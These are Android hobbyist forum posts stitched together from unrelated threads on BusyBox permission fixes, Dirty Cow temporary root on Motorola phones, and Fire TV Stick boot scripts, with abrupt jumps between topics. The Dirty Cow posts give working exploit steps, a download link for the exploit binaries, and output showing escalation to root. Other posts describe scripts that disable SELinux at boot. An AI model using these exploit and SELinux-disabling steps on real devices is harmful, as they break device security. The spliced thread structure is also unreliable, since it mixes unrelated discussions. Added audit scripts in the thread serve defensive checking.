Thank you alireza7991, I am not an expert yet on Android (despite knowing some UNIX) so how can I first check if BusyBox is (properly) installed on this device? Is there a simple way to check, by means of e.g. a test command?
The ROM I am using is excellent RocketTab v3.1 for my Galaxy Tab 3 7" but unfortunately the thread is now locked (to ask). However, there is mention that BusyBox is installed... perhaps only the PATH environment was missing?
Many thanks again!
It's pretty similar to UNIX. Type 'busybox' in terminal; if busybox has not been installed, the shell will say the command is not found or something similar.
Hi again alireza7991, thanks for your info. Typing "busybox" on the terminal window on my Mac (via SSHDroid) I get:
Code:
BusyBox v1.21.0 (2013-07-08 16:00:47 CEST) multi-call binary.
Now, your export command although accepted, didn't work. So I figured typing it as I find it on my Mac:
Code:
export PATH="/system/xbin/":$PATH
instead of
export PATH=${PATH}:/system/xbin
And now the script works, I tried it with -s option (for simulation) and get nothing as error(s) for apps. Does that mean I am OK in terms of "fixed" permissions?
However, as you can see, the last part of the script still has issues? Or is it the "simulation" flag?
Your comment is appreciated again… I think it's that last bit in your script (chmod 644 /system/app/*) which I am not sure what it serves for… or is it /system/ not properly mounted as r/w?
Many thanks:
Code:
[email protected]:/data/data/berserker.android.apps.sshdroid/home # ./fp.sh -s
./fp.sh started at 02-15-2014 13:56:44
Processing (1 of 113): com.google.android.location...
Processing (2 of 113): com.imdb.mobile...
Processing (3 of 113): com.sec.android.app.phoneutil...
[...]
Processing (111 of 113): com.bigeyes0x0.trickstermod...
Processing (112 of 113): com.google.android.syncadapters.contacts...
Processing (113 of 113): com.google.android.backup...
./fp.sh ended at 02-15-2014 13:58:18 (Runtime:1m34s)
chmod: /system/app/AllshareService.apk: Read-only file system
chmod: /system/app/ApplicationsProvider.apk: Read-only file system
[...]
chmod: /system/app/minimode-res.apk: Read-only file system
chmod: /system/app/serviceModeApp.apk: Read-only file system
[email protected]:/data/data/berserker.android.apps.sshdroid/home #
I think I forgot to mount system rw before. This was used to fix a bug which caused a bootloop on my device.
However, this is an extremely old job and I do not remember what I have done, sorry.
alireza7991 said:
I think I forgot to mount system rw before. This was used to fix a bug which caused a bootloop on my device.
However, this is an extremely old job and I do not remember what I have done, sorry.
How can this be included in my ROM build?
Thanks to @kryz who managed to generalize the Dirty Cow exploit, XT1028 now has a way to get temporary root: link. Notice that /system will still be read-only, but at least full access to /data is available. Given the state of XT1028, this looks like pretty good progress!
Steps to get temp root (in Lollipop):
1) install Croowt.apk, use the 2nd option in the menu : "Get root"
2) install SuperSu apk from the playstore (don't update the binary)
3) install RootChecker apk from the playstore
4) enjoy temporary root (until hard reboot)
The earlier post for Android 4.4.4:
For all KitKat holdouts, I've tried to use Dirty Cow and got temp root. Could work on other Android versions as well. Now, at least this root one does not seem to crash as much (unlike Kingroot). Here is a brief set of steps. First, download this package:
https://mega.nz/#!LFlBRAhS!rDl7PJMkFq7HqUDDgbKV6ddv-C3qkQIJl_CJkhkx2sc
Then
Code:
adb push dirtycow /data/local/tmp
adb push cow-execute /data/local/tmp
adb shell
cd /data/local/tmp
chmod 0777 *
[email protected]_cdma:/data/local/tmp $ ./dirtycow /system/bin/run-as ./cow-execute
bin/run-as ./cow-execute <
warning: new file size (13728) and file old size (9432) differ
size 13728
[] mmap 0xb6e64000
[] exploit (patch)
[] currently 0xb6e64000=464c457f
[] madvise = 0xb6e64000 13728
[] madvise = 0 1048576
[] /proc/self/mem 0 1048576
[] exploited 0xb6e64000=464c457f
[email protected]_cdma:/data/local/tmp $ run-as -exec id
run-as -exec id
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'id' with 0 arguments
uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1011(adb),10
15(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net
_bw_stats) context=u:r:runas:s0
[email protected]_cdma:/data/local/tmp $ run-as -exec sh
run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments
[email protected]_cdma:/data/local/tmp #
Not sure how much one can do here without bootloader unlock though ...
Tried it on my Cricket Wireless XT1045 which has been stuck on 4.4.4 without any kind of root for a while now and it worked as shown in your post. Hopefully it'll be a stepping stone to some more permanent kind of root, maybe even something that can be used with Sunshine to unlock the bootloader.
linuxgator said:
Tried it on my Cricket Wireless XT1045 which has been stuck on 4.4.4 without any kind of root for a while now and it worked as shown in your post. Hopefully it'll be a stepping stone to some more permanent kind of root, maybe even something that can be used with Sunshine to unlock the bootloader.
Try this, see if you can copy su binary to system (it will disappear after reboot) :
http://android.stackexchange.com/questions/127230/android-adb-has-root-access-but-no-su-binary
Then soft reboot to make it work, in root shell type :
killall zygote
The hope is to get you SuperSu (until next reboot). I believe we are probably back to where these phones were with the old Pie exploit:
http://forum.xda-developers.com/moto-x/orig-development/root-4-4-x-pie-motorola-devices-t2771623
Kingroot used to be able to make a fake copy of itself into /system which disappeared soon after.
I have this stupid Watcher on my phone, and don't want to try these other steps since I don't want it to kill my corporate email ...
Updated with the new Lollipop instructions!
@linuxgator
Nice link down
@bibikalka any chance you can post the kitkat version again?
[UPDATE #1] I've added a zip file with the 2 scripts, with UNIX line endings, as suggested below by @aftvNews. Cheers.
[UPDATE #2] I've added a zip file with the 2 extra scripts to go into /etc/init.d, as requested by @Axecaster. These will need the same ownership and permissions as enableotg. They disable SELinux and set the permissions on the recovery directories. Cheers.
Having had a look around the android image on my Fire TV Stick (v1) [ FireOS 5.2.1.1 @rbox ] I found that a script, which doesn't exist, called /system/bin/factoryadb.sh was being run by /init.build.rc on boot.
I was able to create a simple script to run scripts in /etc/init.d on boot.
UPDATE (05/04/19): Now I've got root access on my FireTV Gen 2 [ FireOS 5.2.6.9 ] I can see that these instructions will also work, although the OTG enabling is not needed.
NOTE: I've only tested this on a 1st generation Fire TV Stick but may work on Fire TV boxes if they also call /system/bin/factoryadb.sh from /init.build.rc
Before you do this please make sure factoryadb.sh is NOT on your FireTV and that it is called from /init.build.rc by connecting to your FireTV via adb and running the following commands
Code:
adb shell
su
grep factoryadb /init.build.rc && ls -l /system/bin/factoryadb.sh
Hopefully this will return
Code:
service factoryadb /system/bin/factoryadb.sh
/system/bin/factoryadb.sh: No such file or directory
Now continue ...
My factoryadb.sh script
Code:
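#!/system/bin/sh
#
# Execute all scripts in /etc/init.d
# (started by init through the factoryadb service entry in /init.build.rc)
if [ -d /etc/init.d ]
then
    # The glob expands in sorted order; quoting keeps odd file names intact
    for f in /etc/init.d/*
    do
        # Skip empty files (and the unexpanded pattern if the directory is empty)
        if [ -s "${f}" ]
        then
            echo "Executing ${f} ..." >/dev/kmsg
            /system/bin/sh "${f}"
        fi
    done
fi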
NOTE: Make sure this file has UNIX line endings only. Notepad++ has an option to specify UNIX line endings.
I also have a simple script to enable OTG which I called enableotg, again MUST have UNIX line endings.
Code:
#!/system/bin/sh
echo 1 > /sys/devices/platform/bcmpmu_otg_xceiv/host
Connect to the Fire TV Stick via adb and run the following commands
Code:
adb push factoryadb.sh /sdcard/
adb push enableotg /sdcard/
adb shell
su
mount -o remount,rw /system
mkdir /etc/init.d
cp /sdcard/factoryadb.sh /system/bin/
cp /sdcard/enableotg /etc/init.d/
chown 0:0 /system/bin/factoryadb.sh /etc/init.d /etc/init.d/enableotg
chmod 755 /system/bin/factoryadb.sh /etc/init.d /etc/init.d/enableotg
mount -o remount,ro /system
reboot
When the FireTV Stick has rebooted then reconnect via adb and run the following commands
Code:
adb shell
su
dmesg | grep -e factoryadb -e Executing -e bcmpmu
You should see something similar to
Code:
<6>[ 3.005279] bcmpmu_otg_xceiv bcmpmu_otg_xceiv: Probing started...
<6>[ 3.007690] bcmpmu_otg_xceiv bcmpmu_otg_xceiv: Probing successful
<3>[ 4.998016] init: Warning! Service factoryadb needs a SELinux domain defined; please fix!
<4>[ 5.573242] Executing /etc/init.d/enableotg ...
<6>[ 5.579040] bcmpmu_otg_xceiv bcmpmu_otg_xceiv: Switching to Host
All is working and OTG should be working about 5 seconds after leaving the TWRP screen and long before Android has finished booting.
If you have an ethernet dongle attached it should have an IP address before the launcher starts
NOTE: The SELinux warning can be safely ignored.
Hope this helps.
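The post above works because /init.build.rc starts a service whose executable does not exist, so creating that file is enough to get code run at every boot. As an added example (not part of the original post), this audit lists init service entries that point at missing or loosely writable executables; apart from the factoryadb line, the sample rc content, the service names and the ROOT argument are constructed assumptions.

```shell
#!/bin/sh
# Added example: find init "service" entries whose executable is missing or
# loosely writable. Meant to run on a workstation against an unpacked image or
# files pulled from the device (ROOT is that directory); needs awk, tr and find.

# Constructed sample tree. Only the factoryadb line is taken from the thread;
# the "logwrap" and "loosed" services are made up for the demonstration.
build_sample_tree() {
    mkdir -p "$1/system/bin"
    cat > "$1/init.build.rc" <<'EOF'
# constructed sample of an init rc file
service factoryadb /system/bin/factoryadb.sh
    class main
    oneshot
service logwrap /system/bin/logwrapper
service loosed /system/bin/loosed --daemon
EOF
    : > "$1/system/bin/logwrapper"; chmod 0755 "$1/system/bin/logwrapper"
    : > "$1/system/bin/loosed";     chmod 0777 "$1/system/bin/loosed"
}

# audit_init_services ROOT
# Prints "<STATUS> <service> <path> <rcfile>" for every finding:
#   MISSING   the executable does not exist, so whoever can create that path
#             decides what init runs at boot
#   WRITABLE  the executable exists but is group- or world-writable
audit_init_services() {
    root=${1%/}
    for rc in "$root"/*.rc; do
        [ -f "$rc" ] || continue
        # rc syntax: service <name> <pathname> [ <argument> ]*
        # tr drops CRs so a file saved with DOS line endings still parses.
        tr -d '\r' < "$rc" |
        awk '$1 == "service" && NF >= 3 { print $2, $3 }' |
        while read -r name path; do
            target="$root$path"
            if [ ! -e "$target" ]; then
                echo "MISSING $name $path ${rc##*/}"
            elif [ -n "$(find -L "$target" -prune \
                         \( -perm -0002 -o -perm -0020 \) -print)" ]; then
                echo "WRITABLE $name $path ${rc##*/}"
            fi
        done
    done
}

# Demo on the constructed tree
demo=$(mktemp -d)
build_sample_tree "$demo"
audit_init_services "$demo"
rm -rf "$demo"
```

A MISSING line on a production image is worth fixing at build time, either by removing the service entry or by shipping a root-owned, non-writable executable at that path.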
Nicely done. Clever using the missing factoryadb.sh to roll your own init.d.
Might be easier for some if you just upload/attach your factoryadb.sh and enableotg files that others can download, so there's no need to worry about proper UNIX line endings.
Worked nicely on one of my gen 1 sticks running 5.2.4.1_r2.
OTG works for USB pendrive?
AFTVnews.com said:
Nicely done. Clever using the missing factoryadb.sh to roll your own init.d.
Might be easier for some if you just upload/attach your factoryadb.sh and enableotg files that others can download, so there's no need to worry about proper UNIX line endings.
Doh! Completely missed the section to "Attach Files" when I was writing the post
I've now added a zip file with the 2 scripts with UNIX line endings to the post.
Cheers
Awesome job figuring out this was possible! I can confirm the init.d part works just fine on the FireTV-v1 on Rbox v5.2.4.1_r2 (didn't test OTG scripts as I already have a full USB port).
I am going to be adding in your init.d support to my Playing with Fire MOD for the next release.
Now just got to get PS3 / Xbox One controller kernel plugins compiled and working for the Gen1 devices now that init.d works. :good:
dony71 said:
OTG works for USB pendrive?
I tried this on fire tv stick 1, usb storage does not work.
dmesg shows my Kingston USB pendrive being recognized by kernel,
but registered driver dbus_usbdev?
So I guess kernel doesn't have USB storage driver?
----------------------------------------------------------------------------------------------------
<6>[ 7.267791] usb 3-1: new high speed USB device number 2 using dwc_otg
<6>[ 7.538024] usb 3-1: New USB device found, idVendor=0951, idProduct=1642
<6>[ 7.538116] usb 3-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
<6>[ 7.538238] usb 3-1: Product: DT 101 G2
<6>[ 7.538330] usb 3-1: Manufacturer: Kingston
<6>[ 7.538482] usb 3-1: SerialNumber: 001CC0EC3509EA50B0000232
<6>[ 47.829345] usbcore: registered new interface driver dbus_usbdev
<3>[ 60.385131] init: Warning! Service adb_usb needs a SELinux domain defined; please fix!
Does this enable the use of USB storage, as I've had this setup for over 6 months now to enable USB peripheral support on boot (with a script booter)? If not, I guess it's still good to do away with the extra apk I had installed to enable my script at boot.
What does this actually do? My FireTV already can read from usb drives.
tdfsu said:
What does this actually do? My FireTV already can read from usb drives.
Seems mainly for gen 1 sticks to enable usb peripherals. Each boot requires a command to be re-run to recognize usb keyboards, mice, wired networking port, etc. Someone correct me if I'm wrong, but this configuration could in-theory assign multiple scripts to run on boot without extra apps installed.
Axecaster said:
Seems mainly for gen 1 sticks to enable usb peripherals. Each boot requires a command to be re-run to recognize usb keyboards, mice, wired networking port, etc. Someone correct me if I'm wrong, but this configuration could in-theory assign multiple scripts to run on boot without extra apps installed.
Yes Gen2 sticks and the main FireTV's seem to have OTG already enabled but Gen1 sticks don't.
However even though I've only specified enabling OTG in my initial post, as Axecaster mentioned I do in fact have a number of scripts in /etc/init.d that run on boot.
e.g. Set SELinux to Permissive, set full R/W access on the recovery directories, cleanup some temp files on boot etc
I'm currently checking to see if I can set a static IP on the USB Ethernet adapter I use with my Gen1 stick which will most likely result in a new script in /etc/init.d
I also need to investigate the USB storage options more though. Might be the same issue as I'm having with NFS mounts. I can mount an NFS share but currently only root can see it!
Hope this helps.
tgellen said:
Yes Gen2 sticks and the main FireTV's seem to have OTG already enabled but Gen1 sticks don't.
However even though I've only specified enabling OTG in my initial post, as Axecaster mentioned I do in fact have a number of scripts in /etc/init.d that run on boot.
e.g. Set SELinux to Permissive, set full R/W access on the recovery directories, cleanup some temp files on boot etc
I'm currently checking to see if I can set a static IP on the USB Ethernet adapter I use with my Gen1 stick which will most likely result in a new script in /etc/init.d
I also need to investigate the USB storage options more though. Might be the same issue as I'm having with NFS mounts. I can mount an NFS share but currently only root can see it!
Hope this helps.
Have you checked or modified your "persist-usb-config" file yet? If yours has different values than this (from a FireTV-Box) edit it to match mine and see if that helps.
Code:
[email protected]:/ # cat /data/property/persist.sys.usb.config
diag,serial_smd,serial_tty,rmnet_bam,mass_storage,adb
As for your NFS shares issue you are going to need to do a Bind Mount to get non-root users able to access the directory. I'm using the same bind-mount method to get a bunch of additional GApps installed on the FireTV by binding folders in /data/local/ --> /system/priv-app and using your /etc/init.d/ discovery to launch it automatically on boot.
[email protected]: # mkdir /data/local/nfs && chmod 0755 /data/local/nfs && chown 0:0 /data/local/nfs
init.d startup script:
Code:
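#!/system/bin/sh
NFSPATH=/path/to/nfs
NFSDATA=/data/local/nfs
# Bind the NFS mount onto the directory under /data/local, then remount with tighter options
# (mount options are one comma-separated list; the access-time option is spelled relatime)
(mount -o bind "$NFSPATH" "$NFSDATA") ; (mount -o remount,nosuid,nodev,noexec,relatime,async "$NFSPATH")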
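Two questions in this thread come down to the effective mount options: the chmod failures with "Read-only file system" on /system/app, and whether the NFS bind mount above really ended up with nosuid,nodev,noexec. As an added example (not from any poster), this check reads /proc/mounts-format text and compares options as exact tokens; the sample mounts file, device names and address are constructed.

```shell
#!/bin/sh
# Added example: check mount options by exact token, from /proc/mounts-format text.

# Constructed sample (device names and the NFS export are placeholders).
write_sample_mounts() {
    cat > "$1" <<'EOF'
rootfs / rootfs ro,relatime 0 0
/dev/block/system /system ext4 ro,seclabel,relatime,data=ordered 0 0
/dev/block/userdata /data ext4 rw,seclabel,nosuid,nodev,noatime,errors=remount-ro 0 0
192.0.2.10:/export/media /data/local/nfs nfs rw,nosuid,nodev,relatime,vers=3 0 0
EOF
}

# mount_opts MOUNTPOINT [MOUNTS_FILE]
# Prints the option string of the last entry for MOUNTPOINT; when mounts are
# stacked on one directory, the last line is the one currently visible.
mount_opts() {
    awk -v mp="$1" '$2 == mp { o = $4 } END { if (o != "") print o }' \
        "${2:-/proc/mounts}"
}

# missing_mount_opts MOUNTPOINT "opt1 opt2 ..." [MOUNTS_FILE]
# Prints the required options that are absent. Returns 0 if none are missing,
# 1 if some are, 2 if MOUNTPOINT is not mounted at all.
missing_mount_opts() {
    opts=$(mount_opts "$1" "${3:-/proc/mounts}")
    if [ -z "$opts" ]; then
        echo "not-mounted"
        return 2
    fi
    missing=
    for want in $2; do
        # Compare whole comma-separated tokens: a substring match for "ro"
        # would wrongly accept "errors=remount-ro".
        case ",$opts," in
            *",$want,"*) ;;
            *) missing="${missing:+$missing }$want" ;;
        esac
    done
    if [ -n "$missing" ]; then
        echo "$missing"
        return 1
    fi
    return 0
}

# Demo on the constructed sample
sample=$(mktemp)
write_sample_mounts "$sample"
echo "/system options: $(mount_opts /system "$sample")"
echo "/system lacks: $(missing_mount_opts /system 'rw' "$sample")"
echo "/data/local/nfs lacks: $(missing_mount_opts /data/local/nfs 'nosuid nodev noexec' "$sample")"
rm -f "$sample"
```

On a device, leave out the file argument to read /proc/mounts directly; awk has to be available there, for instance through BusyBox.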
SimLynks said:
Have you checked or modified your "persist-usb-config" file yet? If yours has different values than this (from a FireTV-Box) edit it to match mine and see if that helps.
Result:
Code:
[email protected]:/ # cat /data/property/persist.sys.usb.config
adb[email protected]:/ #
I pulled the file, replaced "adb" with "iag,serial_smd,serial_tty,rmnet_bam,mass_storage,adb", pushed it back and rebooted the device.
Result: ADB is disabled and otg doesn't seem to work (usb flash drive)
Enabling ADB sets the file back to "adb" and after a reboot otg is working again.
After installing xposed framework on the fire tv stick this method for otg on boot no longer works.
any solutions?
thecoonx said:
After installing xposed framework on the fire tv stick this method for otg on boot no longer works.
any solutions?
Hmm. I installed this method after xposed framework. As far as I'm aware, everything seems to be working.
thecoonx said:
After installing xposed framework on the fire tv stick this method for otg on boot no longer works.
any solutions?
Axecaster said:
Hmm. I installed this method after xposed framework. As far as I'm aware, everything seems to be working.
So only set up your scripts after you are done flashing a PreRooted ROM &/or SuperSU &/or XPosed Framework. So in other words only after you're done messing with things that mess with /System in TWRP. Or you will have to reset them again.
Hi SimLynks,
Thanks for your suggestion. The bind mount did make the directory available for the non-root user but unfortunately its contents were still only visible to the root user
I'll keep on trying
Cheers.
Can this be used in some way to enable OTG while at the TWRP countdown bar (so as to use keyboard/mouse/airmouse within TWRP)? It's a whole lot easier to use than the ADB mouse, having to plug the firestick into a laptop/computer if you need to be in recovery; if it is possible it could be easier.
I use the airmouse/keyboard method myself when I go into recovery but have to use my home made OTG cable and swap over USB to computer after running the command to USB dongle for the airmouse (melee F10 pro). After the command has run while plugged into my laptop I unplug the laptop connection and plug in my dongle and I navigate TWRP with my remote.
Is there any chance that we can enable OTG on non-rooted devices of firetv gen 1? I have firmware 5.2.6.7 so I think there is no way I can root the device. Thanks!
minute said:
Is there any chance that we can enable OTG on non-rooted devices of firetv gen 1? I have firmware 5.2.6.7 so I think there is no way I can root the device. Thanks!
Sorry. Unfortunately you need root access to change the OTG value on the FireTV gen 1